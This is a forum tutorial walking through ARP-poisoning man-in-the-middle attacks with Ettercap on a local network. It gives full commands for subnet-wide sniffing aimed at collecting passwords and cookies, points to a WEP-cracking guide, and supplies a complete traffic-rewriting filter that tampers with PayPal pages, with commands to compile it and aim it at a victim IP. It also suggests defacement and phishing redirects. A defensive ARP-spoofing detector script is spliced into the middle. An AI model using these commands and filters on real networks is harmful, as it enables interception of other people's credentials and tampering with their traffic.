Kalisthetics5569
..:::ETTERCAP:::..
Tut by k0m1kaz33 (AKA Poizon)
Hello and welcome to this tutorial. I will be explaining all you need to know about Ettercap. Before I start I would like to say that this site is not a hacking website, and this tutorial is to be used for informational purposes ONLY.
What is Ettercap?
"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis." In other words, Ettercap is a program that is used for running MITM (man in the middle) attacks on a local area network (LAN). Yes, Ettercap runs under Windows as well, but I mean hey, Linux is better. The program has many features including the ability to use filters, plug-ins, and more. It is like Cain and Abel, except that it is not for script kiddies...
Let's get started!
To start you will need Ettercap. You can get it here. I will not spend much time on explaining how to install the program, because this tut assumes you are using a Backtrack live DVD. You can get this from Remote-Exploit. I recommend downloading and burning the BT4 pre-release. NOT THE BT4 BETA! That has errors. When you download the ISO, burn it to a DVD and then we will go from there.
Okay, so you burned the ISO to the DVD and you have it sitting next to your computer. Pop in the DVD and restart your computer. If you haven't done so, you will need to configure your computer to boot from CD. To do this, as your computer is booting up, press the specified key to load the BIOS (usually F12, F2, F6, or F8). After you have loaded your computer's BIOS, go to the boot tab at the top and change the boot order. Now save your settings and restart the computer. If you are not a retard, and you did everything right, you should load Backtrack 4.
Now that Backtrack is loaded you should see this,

Now type in "startx" and it will load the GUI of Backtrack. After this is done, you will want to configure your network settings. Open up a Konsole and, if you are like me and you are running wireless, type in "/usr/bin/start-network". After that go to the bottom left and open up the menu. Go to Internet, select "WICD" and connect to your own network or the one you cracked from:
Code:
http://www.se7ensins.com/forums/misc-tutorials/129331-tut-hacking-wep-wifi-passwords-total-noob-guide.html
(A little nooby but it works.) Ok, so now you are connected to your network. If you are not connected to the network, or if you are using a wired connection, you may have to go back to the console and type "dhclient". Ok, so now that you are connected to your network you will want to open up a console and start using Ettercap.
What Can We Do?
Well, there are various things that we can do with this program. I will be using the CLI version of Ettercap and not the GUI, because I think it is easier. Head on down to Konsole, and then get ready for some poisoning!
Plain Old Etter
I'm going to start with the easiest of the easy. Nothing out of the blue, just plain old capturing. I usually never do this because I run BT4 off a VM and if I just wanted to do regular capturing, I would open up Cain and just use that for capturing. But I will teach you anyway. So, now that you have a Konsole window open, go ahead and type in:
Code:
ettercap -T -q -i (interface) -L /root -M arp // //
-T (Text only interface)
-q (Quiet, only outputs important data, no bull****)
-i (Interface, eth0 for wired and wlan0, ath0, eth1 etc for wireless)
-L (Logs the data to a file. I find it useful if you are just capturing data, so you can go back and look for what you found)
-M (Type of attack, ARP)
// // (Target range [all in subnet])

Ok, so now that you have that started Ettercap should start popping up packets according to the victims requests, data, etc. This is very useful for collecting passwords and cookies.
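The defender's view of the same thing, as an added example that is not part of the original tutorial: an ARP poison like the one `-M arp // //` starts leaves two traces on the wire, an IP whose MAC suddenly changes and a single MAC answering for many IPs at once. This Python script walks constructed tcpdump-style ARP reply lines (the capture and the MAC addresses are made up for the example) and reports both.

```python
import re
from collections import defaultdict

# Constructed sample, tcpdump-style ARP replies as seen on the LAN while one
# host (00:11:22:33:44:55) starts answering for the gateway and another host.
SAMPLE_ARP = """\
ARP, Reply 192.168.1.1 is-at 00:aa:bb:cc:dd:01, length 28
ARP, Reply 192.168.1.101 is-at 00:aa:bb:cc:dd:65, length 28
ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
ARP, Reply 192.168.1.101 is-at 00:11:22:33:44:55, length 28
ARP, Reply 192.168.1.50 is-at 00:aa:bb:cc:dd:32, length 28
"""

ARP_REPLY = re.compile(r"Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9a-fA-F:]{17})")


def detect_arp_poisoning(capture):
    """Walk ARP replies in order and return (changes, multi_claims).

    changes:      list of (ip, old_mac, new_mac), one entry each time an IP's
                  MAC flips to a different address.
    multi_claims: {mac: sorted IPs} for every MAC that claimed more than one IP,
                  which is what a full-subnet poison (// //) looks like.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    changes = []
    for line in capture.splitlines():
        m = ARP_REPLY.search(line)
        if not m:
            continue  # not an ARP reply, ignore the line
        ip, mac = m.group(1), m.group(2).lower()
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            changes.append((ip, old, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    multi_claims = {mac: sorted(ips) for mac, ips in mac_to_ips.items() if len(ips) > 1}
    return changes, multi_claims


if __name__ == "__main__":
    flips, suspects = detect_arp_poisoning(SAMPLE_ARP)
    for ip, old, new in flips:
        print(f"ALERT: {ip} moved from {old} to {new}")
    for mac, ips in suspects.items():
        print(f"ALERT: {mac} claims {len(ips)} addresses: {', '.join(ips)}")
```

On a real network the same logic runs over `tcpdump -n -e arp` output, and a static entry for the gateway's MAC is the cheapest way to make the first kind of alert reliable.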
Filters
One of my favorite parts of Ettercap: the ability to use filters. In newb words, filters are files that run with Ettercap to perform a specific job. Note that they are separate from plug-ins, and are totally different. For example, you can write a filter that replaces text on a page with something else. (e.g. You make a filter that replaces the text "you have $x in your account" with "you have $0 in your account". So when they go to PayPal, they **** themselves.) Ok, let's start with an example I made just for you.
Ok, so you are going to want to copy this into a text editor and save it as *.filter. So head on over to any old text editor and paste the filter in. I prefer Kate (K-menu > Utilities > Kate - Advanced Text Editor). Save this to your desktop and then open up another Konsole. Now it is time to compile the text filter file into an actual usable filter.
Code:
############################################################################
#                                                                          #
#  Paypal Brownapants *** Based off of Jolly Pwned *** Filter source file  #
#  (Irongeek)                                                              #
#                                                                          #
#  Filter modified by k0m1kaz33 aka Poizon. Based off of Jolly Pwned from  #
#  http://www.irongeek.com                                                 #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

# Requests from the client to the web server (TCP port 80): strip the
# Accept-Encoding header so the server answers in plain text that the
# second rule can search and replace.
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}

# Responses from the web server back to the client: rewrite the balance text.
if (ip.proto == TCP && tcp.src == 80) {
    replace("you have", "You have $0 in your account!");
    msg("Filter Ran.\n");
}
Code:
etterfilter paypal.filter -o paypal.ef

Now that we have compiled the filter...
Code:
ettercap -T -q -i (interface) -F paypal.ef -L /root -M /192.168.1.101/ //
Mostly the same parameters as before.
-F (Specifies which compiled filter file to use)
Note that this time I am targeting one IP on the network by using /x.x.x.x/ // as the target instead of // //. This targets only the IP 192.168.1.101.

As you can see, there are many options you can have with filters. They are very useful and just require an imagination to use. Some ideas:
-Defacing pages
-Redirects to phishing sites (I would just use DNS_spoofing)
-And just for scaring people
But remember that this does require knowledge of some HTML/Java.
Plug-ins
Meh, I'll talk about plug-ins and dns_spoofing tomorrow. I'm tired of typing.
THIS TUT IS ALLOWED BECAUSE H20 PETE SAID SO!
Dedicated to Carson because he taught me how to use RFI (WS)
h2o pete said: You don't need your own consent durrrrrrrrrrr.
Yes post the thread! That would be useful
Thanks!